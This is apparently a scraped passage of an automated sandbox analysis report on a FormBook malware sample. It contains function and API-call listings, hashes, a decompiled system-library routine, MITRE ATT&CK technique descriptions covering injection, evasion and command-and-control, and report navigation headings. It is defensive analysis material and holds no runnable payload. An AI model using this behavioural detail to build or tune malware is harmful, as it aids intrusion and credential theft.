Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 40E01AB12002087BD718DF59CC49EA777ACAF88750F014554BD0857241C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00B07280 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00B072DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00B072FB

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
Instruction ID: f0ab99c5e998bf8ec72ad0fb1f2c93e998d4069a7cc496e52f902efc087d4040
Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
Instruction Fuzzy Hash: AD01A771A8022877E721B6949C03FFE7BAC9F01F51F154194FF04BA1C2EA947A0546F6

Uniqueness

Uniqueness Score: -1.00%

Function 00B09B30 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00B09BA2

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 28cf5e062532a9266270ddb6d3a64898cc1ee14d17a6aeca217f096c4aa63a5c
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 1C011EB5E0020DABDF10DAA4EC42FDDB7B89B54308F1081E5E91897282F671EB54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B1894E Relevance: 1.5, APIs: 1, Instructions: 43
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00B189A4

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: acf8a4913d8c54202c107b5ee19324671d998559724f8a9d02a26c16a2dfe6ad
Instruction ID: 87ee99b894f6a7c3e89d423d38fad9c76cb2c2cc000af83977af343d034bbaed
Opcode Fuzzy Hash: acf8a4913d8c54202c107b5ee19324671d998559724f8a9d02a26c16a2dfe6ad
Instruction Fuzzy Hash: 7E01AFB2210108BBCB58DF89DC85EEB37EDAF8C754F158258BA4DA7241D630E851CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B18950 Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00B189A4

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 11213f837e9a9f3246e17f353a5926eefadafe75adb8841d6bc2aac9a302b977
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 8101AFB2210108BBCB58DF89DC84EEB77EDAF8C754F158258BA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B17420 Relevance: 1.5, APIs: 1, Instructions: 36
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00B0CCE0,?,?), ref: 00B1745C

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
Instruction ID: b478b7713ffcf1ec32c0f40a8263e4953113fd8918e2fef19c976ff7a626966b
Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
Instruction Fuzzy Hash: 38E06D333903043AE2206599AC02FE7B6DCCB91B60F540066FA0DEB2C1E995F84142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00B188A0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00B13526,?,00B13C9F,00B13C9F,?,00B13526,?,?,?,?,?,00000000,00000000,?), ref: 00B188CD

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 8b353d601134d9ada814abaf8342925c64a45da5696c1d7dce315b5924b520cd
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 1BE01AB1200208BBD714DF59CC45EA777ACAF88650F114558BE085B241C530F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00B18A40 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00B0CFB2,00B0CFB2,?,00000000,?,?), ref: 00B18A70

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 36437dfff6afc30c6855c438572951885809a45e0805da018bdd62390867d72e
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: B1E01AB12002087BDB14DF49CC85EE737ADAF88650F018154BE0867241C930E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00B0D417 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00B07C83,?), ref: 00B0D44B

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: f447dd9b7d707b6eb64c08ee6ca7ab5a5b220b53caadb0575800671d16b4f62f
Instruction ID: 367948c6f54d50dc7657c48fc784ab67be63cb4dad31942cc8919d61efc2dffb
Opcode Fuzzy Hash: f447dd9b7d707b6eb64c08ee6ca7ab5a5b220b53caadb0575800671d16b4f62f
Instruction Fuzzy Hash: 1BD0C2327403406AE600EAB48C03F652AC59B64640F0901B8F58DE73C3EA14D1008131

Uniqueness

Uniqueness Score: -1.00%

Function 00B0D420 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00B07C83,?), ref: 00B0D44B

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: a50fc0dedfc64a3ae7fb4f5e151b97f46fd147757735006628d05161eaa07a9c
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 46D05E627503042AE610BAA49C03F6676C89B44B00F4940A4F948D63C3E964E5004161

Uniqueness

Uniqueness Score: -1.00%

Function 04A8967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A89694

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f59764e698678cb55b4e805b7e2b85dd65f9692737226c74b50ea6c0eb07f3cc
Instruction ID: a41e22ae13b14babd9ab66050694a972c7ed7ae2029bcdbb8f9e54a9ef147dcb
Opcode Fuzzy Hash: f59764e698678cb55b4e805b7e2b85dd65f9692737226c74b50ea6c0eb07f3cc
Instruction Fuzzy Hash: DDB09BB19014C5C5FB11E77047087377944B7D0745F16C065D1021641A4778D4D1F5B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04ADFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04ADFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04A8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04AD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04AD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04adfdda
0x04adfde2
0x04adfde5
0x04adfdec
0x04adfdfa
0x04adfdff
0x04adfe0a
0x04adfe0f
0x04adfe17
0x04adfe1e
0x04adfe19
0x04adfe19
0x04adfe19
0x04adfe20
0x04adfe21
0x04adfe22
0x04adfe25
0x04adfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04ADFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04ADFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04ADFE2B

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 5bb0b556ba2f4d0b6a25ace2ed3a26a8764447bb75d47637f01dfe11001bd430
Instruction ID: 43a3f46ec686393d42bcecaa431a6eb4f7e04670450a85497231378fd5576bd8
Opcode Fuzzy Hash: 5bb0b556ba2f4d0b6a25ace2ed3a26a8764447bb75d47637f01dfe11001bd430
Instruction Fuzzy Hash: E6F0F072600201BFEB201A45DD02F23BB6AFB84B31F244354F629565E1EA62F8209AF4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jwRbEDUUZC

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jwRbEDUUZC.exe.log

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
jwRbEDUUZC

Function 00A132C0 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Function 00A1520D Relevance: 1.7, APIs: 1, Instructions: 240
processCOMMON

Function 00A15218 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Function 00A158F8 Relevance: 1.6, APIs: 1, Instructions: 114
injectionCOMMON

Function 00A15900 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 00A156D9 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Function 00A156E0 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 00A157F0 Relevance: 1.6, APIs: 1, Instructions: 97
memoryCOMMON

Function 00A157F8 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Function 00A155C9 Relevance: 1.6, APIs: 1, Instructions: 92
threadinjectionCOMMON

Function 00A13710 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00A155D0 Relevance: 1.6, APIs: 1, Instructions: 88
threadinjectionCOMMON

Function 00A13718 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Function 00A132B8 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Function 00A13440 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON